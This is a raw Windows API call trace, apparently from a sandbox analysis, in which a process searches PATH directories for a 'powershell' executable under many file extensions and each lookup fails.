	[0872.400] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.400] SetErrorMode (uMode=0x1) returned 0x1
	[0872.400] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0873.286] SetErrorMode (uMode=0x1) returned 0x1
	[0873.287] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0873.287] SetErrorMode (uMode=0x1) returned 0x1
	[0873.287] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0873.300] SetErrorMode (uMode=0x1) returned 0x1
	[0873.302] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0873.302] SetErrorMode (uMode=0x1) returned 0x1
	[0873.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0873.311] SetErrorMode (uMode=0x1) returned 0x1
	[0873.314] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0873.314] SetErrorMode (uMode=0x1) returned 0x1
	[0873.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.000] SetErrorMode (uMode=0x1) returned 0x1
	[0874.002] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.002] SetErrorMode (uMode=0x1) returned 0x1
	[0874.002] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.727] SetErrorMode (uMode=0x1) returned 0x1
	[0874.728] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.728] SetErrorMode (uMode=0x1) returned 0x1
	[0874.729] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.739] SetErrorMode (uMode=0x1) returned 0x1
	[0874.740] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.741] SetErrorMode (uMode=0x1) returned 0x1
	[0874.741] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.753] SetErrorMode (uMode=0x1) returned 0x1
	[0874.754] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.754] SetErrorMode (uMode=0x1) returned 0x1
	[0874.754] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.371] SetErrorMode (uMode=0x1) returned 0x1
	[0875.372] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.391] SetErrorMode (uMode=0x1) returned 0x1
	[0875.392] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.404] SetErrorMode (uMode=0x1) returned 0x1
	[0876.406] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0876.406] SetErrorMode (uMode=0x1) returned 0x1
	[0876.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.418] SetErrorMode (uMode=0x1) returned 0x1
	[0876.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.419] SetErrorMode (uMode=0x1) returned 0x1
	[0876.420] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.420] SetErrorMode (uMode=0x1) returned 0x1
	[0876.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.420] SetErrorMode (uMode=0x1) returned 0x1
	[0876.421] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.421] SetErrorMode (uMode=0x1) returned 0x1
	[0876.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.421] SetErrorMode (uMode=0x1) returned 0x1
	[0876.421] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.422] SetErrorMode (uMode=0x1) returned 0x1
	[0876.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.422] SetErrorMode (uMode=0x1) returned 0x1
	[0876.422] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.422] SetErrorMode (uMode=0x1) returned 0x1
	[0876.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.423] SetErrorMode (uMode=0x1) returned 0x1
	[0876.423] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.423] SetErrorMode (uMode=0x1) returned 0x1
	[0876.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.423] SetErrorMode (uMode=0x1) returned 0x1
	[0876.424] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.424] SetErrorMode (uMode=0x1) returned 0x1
	[0876.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.424] SetErrorMode (uMode=0x1) returned 0x1
	[0876.424] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.425] SetErrorMode (uMode=0x1) returned 0x1
	[0876.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.425] SetErrorMode (uMode=0x1) returned 0x1
	[0876.425] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.425] SetErrorMode (uMode=0x1) returned 0x1
	[0876.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.428] SetErrorMode (uMode=0x1) returned 0x1
	[0876.428] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.910] SetErrorMode (uMode=0x1) returned 0x1
	[0876.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.911] SetErrorMode (uMode=0x1) returned 0x1
	[0876.911] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.911] SetErrorMode (uMode=0x1) returned 0x1
	[0876.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.911] SetErrorMode (uMode=0x1) returned 0x1
	[0876.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.912] SetErrorMode (uMode=0x1) returned 0x1
	[0876.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.912] SetErrorMode (uMode=0x1) returned 0x1
	[0876.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.913] SetErrorMode (uMode=0x1) returned 0x1
	[0876.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.913] SetErrorMode (uMode=0x1) returned 0x1
	[0876.913] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.913] SetErrorMode (uMode=0x1) returned 0x1
	[0876.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.914] SetErrorMode (uMode=0x1) returned 0x1
	[0876.914] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.914] SetErrorMode (uMode=0x1) returned 0x1
	[0876.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.914] SetErrorMode (uMode=0x1) returned 0x1
	[0876.915] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.915] SetErrorMode (uMode=0x1) returned 0x1
	[0876.915] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.915] SetErrorMode (uMode=0x1) returned 0x1
	[0876.915] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.916] SetErrorMode (uMode=0x1) returned 0x1
	[0876.916] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.916] SetErrorMode (uMode=0x1) returned 0x1
	[0876.916] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.916] SetErrorMode (uMode=0x1) returned 0x1
	[0876.916] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.917] SetErrorMode (uMode=0x1) returned 0x1
	[0876.917] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.917] SetErrorMode (uMode=0x1) returned 0x1
	[0876.917] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.917] SetErrorMode (uMode=0x1) returned 0x1
	[0876.917] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.918] SetErrorMode (uMode=0x1) returned 0x1
	[0876.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.918] SetErrorMode (uMode=0x1) returned 0x1
